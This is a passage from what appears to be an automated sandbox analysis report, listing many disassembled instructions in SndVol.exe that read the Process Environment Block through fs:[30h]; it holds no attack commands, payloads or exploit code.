          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B95DA mov eax, dword ptr fs:[00000030h]5_2_365B95DA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C55C0 mov eax, dword ptr fs:[00000030h]5_2_365C55C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15F4 mov eax, dword ptr fs:[00000030h]5_2_365B15F4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15F4 mov eax, dword ptr fs:[00000030h]5_2_365B15F4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15F4 mov eax, dword ptr fs:[00000030h]5_2_365B15F4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15F4 mov eax, dword ptr fs:[00000030h]5_2_365B15F4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15F4 mov eax, dword ptr fs:[00000030h]5_2_365B15F4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15F4 mov eax, dword ptr fs:[00000030h]5_2_365B15F4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366655C9 mov eax, dword ptr fs:[00000030h]5_2_366655C9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3660D5D0 mov eax, dword ptr fs:[00000030h]5_2_3660D5D0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3660D5D0 mov ecx, dword ptr fs:[00000030h]5_2_3660D5D0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366635D7 mov eax, dword ptr fs:[00000030h]5_2_366635D7
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366635D7 mov eax, dword ptr fs:[00000030h]5_2_366635D7
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366635D7 mov eax, dword ptr fs:[00000030h]5_2_366635D7
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366635B6 mov eax, dword ptr fs:[00000030h]5_2_366635B6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3662D5B0 mov eax, dword ptr fs:[00000030h]5_2_3662D5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3662D5B0 mov eax, dword ptr fs:[00000030h]5_2_3662D5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658758F mov eax, dword ptr fs:[00000030h]5_2_3658758F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658758F mov eax, dword ptr fs:[00000030h]5_2_3658758F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658758F mov eax, dword ptr fs:[00000030h]5_2_3658758F
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366235BA mov eax, dword ptr fs:[00000030h]5_2_366235BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366235BA mov eax, dword ptr fs:[00000030h]5_2_366235BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366235BA mov eax, dword ptr fs:[00000030h]5_2_366235BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366235BA mov eax, dword ptr fs:[00000030h]5_2_366235BA
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664F5BE mov eax, dword ptr fs:[00000030h]5_2_3664F5BE
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF5B0 mov eax, dword ptr fs:[00000030h]5_2_365BF5B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15A9 mov eax, dword ptr fs:[00000030h]5_2_365B15A9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15A9 mov eax, dword ptr fs:[00000030h]5_2_365B15A9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15A9 mov eax, dword ptr fs:[00000030h]5_2_365B15A9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15A9 mov eax, dword ptr fs:[00000030h]5_2_365B15A9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B15A9 mov eax, dword ptr fs:[00000030h]5_2_365B15A9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661B594 mov eax, dword ptr fs:[00000030h]5_2_3661B594
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661B594 mov eax, dword ptr fs:[00000030h]5_2_3661B594
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665D26B mov eax, dword ptr fs:[00000030h]5_2_3665D26B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665D26B mov eax, dword ptr fs:[00000030h]5_2_3665D26B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C724D mov eax, dword ptr fs:[00000030h]5_2_365C724D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589240 mov eax, dword ptr fs:[00000030h]5_2_36589240
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589240 mov eax, dword ptr fs:[00000030h]5_2_36589240
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D1270 mov eax, dword ptr fs:[00000030h]5_2_365D1270
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D1270 mov eax, dword ptr fs:[00000030h]5_2_365D1270
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B9274 mov eax, dword ptr fs:[00000030h]5_2_365B9274
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664B256 mov eax, dword ptr fs:[00000030h]5_2_3664B256
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664B256 mov eax, dword ptr fs:[00000030h]5_2_3664B256
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665227 mov eax, dword ptr fs:[00000030h]5_2_36665227
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C7208 mov eax, dword ptr fs:[00000030h]5_2_365C7208
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C7208 mov eax, dword ptr fs:[00000030h]5_2_365C7208
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366652E2 mov eax, dword ptr fs:[00000030h]5_2_366652E2
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366412ED mov eax, dword ptr fs:[00000030h]5_2_366412ED
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B2D3 mov eax, dword ptr fs:[00000030h]5_2_3658B2D3
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B2D3 mov eax, dword ptr fs:[00000030h]5_2_3658B2D3
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658B2D3 mov eax, dword ptr fs:[00000030h]5_2_3658B2D3
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF2D0 mov eax, dword ptr fs:[00000030h]5_2_365BF2D0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF2D0 mov eax, dword ptr fs:[00000030h]5_2_365BF2D0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663B2F0 mov eax, dword ptr fs:[00000030h]5_2_3663B2F0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663B2F0 mov eax, dword ptr fs:[00000030h]5_2_3663B2F0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C0 mov eax, dword ptr fs:[00000030h]5_2_365BB2C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C0 mov eax, dword ptr fs:[00000030h]5_2_365BB2C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C0 mov eax, dword ptr fs:[00000030h]5_2_365BB2C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C0 mov eax, dword ptr fs:[00000030h]5_2_365BB2C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C0 mov eax, dword ptr fs:[00000030h]5_2_365BB2C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C0 mov eax, dword ptr fs:[00000030h]5_2_365BB2C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB2C0 mov eax, dword ptr fs:[00000030h]5_2_365BB2C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365992C5 mov eax, dword ptr fs:[00000030h]5_2_365992C5
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365992C5 mov eax, dword ptr fs:[00000030h]5_2_365992C5
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664F2F8 mov eax, dword ptr fs:[00000030h]5_2_3664F2F8
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365892FF mov eax, dword ptr fs:[00000030h]5_2_365892FF
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366272A0 mov eax, dword ptr fs:[00000030h]5_2_366272A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366272A0 mov eax, dword ptr fs:[00000030h]5_2_366272A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C329E mov eax, dword ptr fs:[00000030h]5_2_365C329E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C329E mov eax, dword ptr fs:[00000030h]5_2_365C329E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366592A6 mov eax, dword ptr fs:[00000030h]5_2_366592A6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366592A6 mov eax, dword ptr fs:[00000030h]5_2_366592A6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366592A6 mov eax, dword ptr fs:[00000030h]5_2_366592A6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366592A6 mov eax, dword ptr fs:[00000030h]5_2_366592A6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366192BC mov eax, dword ptr fs:[00000030h]5_2_366192BC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366192BC mov eax, dword ptr fs:[00000030h]5_2_366192BC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366192BC mov ecx, dword ptr fs:[00000030h]5_2_366192BC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366192BC mov ecx, dword ptr fs:[00000030h]5_2_366192BC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665283 mov eax, dword ptr fs:[00000030h]5_2_36665283
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A52A0 mov eax, dword ptr fs:[00000030h]5_2_365A52A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A52A0 mov eax, dword ptr fs:[00000030h]5_2_365A52A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A52A0 mov eax, dword ptr fs:[00000030h]5_2_365A52A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A52A0 mov eax, dword ptr fs:[00000030h]5_2_365A52A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664F367 mov eax, dword ptr fs:[00000030h]5_2_3664F367
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589353 mov eax, dword ptr fs:[00000030h]5_2_36589353
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589353 mov eax, dword ptr fs:[00000030h]5_2_36589353
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36633370 mov eax, dword ptr fs:[00000030h]5_2_36633370
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658D34C mov eax, dword ptr fs:[00000030h]5_2_3658D34C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658D34C mov eax, dword ptr fs:[00000030h]5_2_3658D34C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665341 mov eax, dword ptr fs:[00000030h]5_2_36665341
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36597370 mov eax, dword ptr fs:[00000030h]5_2_36597370
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36597370 mov eax, dword ptr fs:[00000030h]5_2_36597370
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36597370 mov eax, dword ptr fs:[00000030h]5_2_36597370
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665132D mov eax, dword ptr fs:[00000030h]5_2_3665132D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665132D mov eax, dword ptr fs:[00000030h]5_2_3665132D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36587330 mov eax, dword ptr fs:[00000030h]5_2_36587330
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661930B mov eax, dword ptr fs:[00000030h]5_2_3661930B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661930B mov eax, dword ptr fs:[00000030h]5_2_3661930B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661930B mov eax, dword ptr fs:[00000030h]5_2_3661930B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BF32A mov eax, dword ptr fs:[00000030h]5_2_365BF32A
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664F3E6 mov eax, dword ptr fs:[00000030h]5_2_3664F3E6
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366653FC mov eax, dword ptr fs:[00000030h]5_2_366653FC
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3664B3D0 mov ecx, dword ptr fs:[00000030h]5_2_3664B3D0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365E739A mov eax, dword ptr fs:[00000030h]5_2_365E739A
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365E739A mov eax, dword ptr fs:[00000030h]5_2_365E739A
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366313B9 mov eax, dword ptr fs:[00000030h]5_2_366313B9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366313B9 mov eax, dword ptr fs:[00000030h]5_2_366313B9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366313B9 mov eax, dword ptr fs:[00000030h]5_2_366313B9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3666539D mov eax, dword ptr fs:[00000030h]5_2_3666539D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C33A0 mov eax, dword ptr fs:[00000030h]5_2_365C33A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C33A0 mov eax, dword ptr fs:[00000030h]5_2_365C33A0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B33A5 mov eax, dword ptr fs:[00000030h]5_2_365B33A5
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665060 mov eax, dword ptr fs:[00000030h]5_2_36665060
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BB052 mov eax, dword ptr fs:[00000030h]5_2_365BB052
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661106E mov eax, dword ptr fs:[00000030h]5_2_3661106E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3660D070 mov ecx, dword ptr fs:[00000030h]5_2_3660D070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov ecx, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A1070 mov eax, dword ptr fs:[00000030h]5_2_365A1070
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663705E mov ebx, dword ptr fs:[00000030h]5_2_3663705E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3663705E mov eax, dword ptr fs:[00000030h]5_2_3663705E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665903E mov eax, dword ptr fs:[00000030h]5_2_3665903E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665903E mov eax, dword ptr fs:[00000030h]5_2_3665903E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665903E mov eax, dword ptr fs:[00000030h]5_2_3665903E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3665903E mov eax, dword ptr fs:[00000030h]5_2_3665903E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B90DB mov eax, dword ptr fs:[00000030h]5_2_365B90DB
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov ecx, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov ecx, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov ecx, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov ecx, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365A70C0 mov eax, dword ptr fs:[00000030h]5_2_365A70C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3660D0C0 mov eax, dword ptr fs:[00000030h]5_2_3660D0C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3660D0C0 mov eax, dword ptr fs:[00000030h]5_2_3660D0C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B50E4 mov eax, dword ptr fs:[00000030h]5_2_365B50E4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365B50E4 mov ecx, dword ptr fs:[00000030h]5_2_365B50E4
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_366650D9 mov eax, dword ptr fs:[00000030h]5_2_366650D9
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365C909C mov eax, dword ptr fs:[00000030h]5_2_365C909C
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BD090 mov eax, dword ptr fs:[00000030h]5_2_365BD090
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365BD090 mov eax, dword ptr fs:[00000030h]5_2_365BD090
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36595096 mov eax, dword ptr fs:[00000030h]5_2_36595096
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658D08D mov eax, dword ptr fs:[00000030h]5_2_3658D08D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661D080 mov eax, dword ptr fs:[00000030h]5_2_3661D080
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3661D080 mov eax, dword ptr fs:[00000030h]5_2_3661D080
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36597152 mov eax, dword ptr fs:[00000030h]5_2_36597152
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589148 mov eax, dword ptr fs:[00000030h]5_2_36589148
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589148 mov eax, dword ptr fs:[00000030h]5_2_36589148
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589148 mov eax, dword ptr fs:[00000030h]5_2_36589148
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36589148 mov eax, dword ptr fs:[00000030h]5_2_36589148
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36629179 mov eax, dword ptr fs:[00000030h]5_2_36629179
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36623140 mov eax, dword ptr fs:[00000030h]5_2_36623140
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36623140 mov eax, dword ptr fs:[00000030h]5_2_36623140
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36623140 mov eax, dword ptr fs:[00000030h]5_2_36623140
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_3658F172 mov eax, dword ptr fs:[00000030h]5_2_3658F172
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36665152 mov eax, dword ptr fs:[00000030h]5_2_36665152
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36667120 mov eax, dword ptr fs:[00000030h]5_2_36667120
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36591131 mov eax, dword ptr fs:[00000030h]5_2_36591131
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_36591131 mov eax, dword ptr fs:[00000030h]5_2_36591131
